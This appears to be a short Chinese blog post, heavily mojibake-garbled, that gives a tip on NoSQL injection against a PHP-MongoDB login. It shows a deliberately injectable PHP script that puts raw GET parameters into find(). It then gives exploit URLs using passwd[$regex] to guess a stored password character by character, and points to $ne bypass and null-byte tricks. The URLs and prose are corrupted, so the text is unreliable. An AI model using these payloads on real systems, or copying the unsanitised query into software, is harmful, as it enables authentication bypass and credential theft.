mongo+php 娉ㄥ皠鐨勪竴涓猼ips
<?php
$con = new Mongo();
$db = $con->selectDB("demo")->selectCollection("admin");
var_dump($_GET['passwd']);
$ds =$db->find(array("username"=>$_GET['username'],"password"=>$_GET['passwd']));
foreach($ds as $k=>$v){
var_dump($v);
}
?>
http://http://www.zjjv.com// /mongo/go-1.php?username=heige&passwd[$regex]=^1
http://http://www.zjjv.com// /mongo/go-1.php?username=heige&passwd[$regex]=^2
娴嬭瘯鐨勬暟鎹搴撶粨鏋勶細
> db.admin.find()
{ "_id" : ObjectId("4f562d110920d897e6765ae1"), "uid" : 1, "username" : "heige", "password" : "123456" }
{ "_id" : ObjectId("4f5b38ba0920d897e6765ae2"), "uid" : 2, "username" : "admin", "password" : "admin" }
杩欐牱鐨勬敞灏勬柟寮忎富瑕佸埄鐢ㄤ簡PHP鐨勭壒鐐癸紝鍙浠ョ洿鎺ユ彁浜array 銆傘傘
鍙﹀栧弬鑰冭佸栫殑2涓猼ips锛
http://http://www.zjjv.com///2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/ 鐩存帴鐢$ne 杩欎釜绫讳技浜庡父瑙佺殑涓囩敤瀵嗙爜
http://http://www.zjjv.com///2011/02/mongodb-null-byte-injection-attacks/ null瀛楄妭娉ㄥ皠
浣滆 5up3rh3i'blog
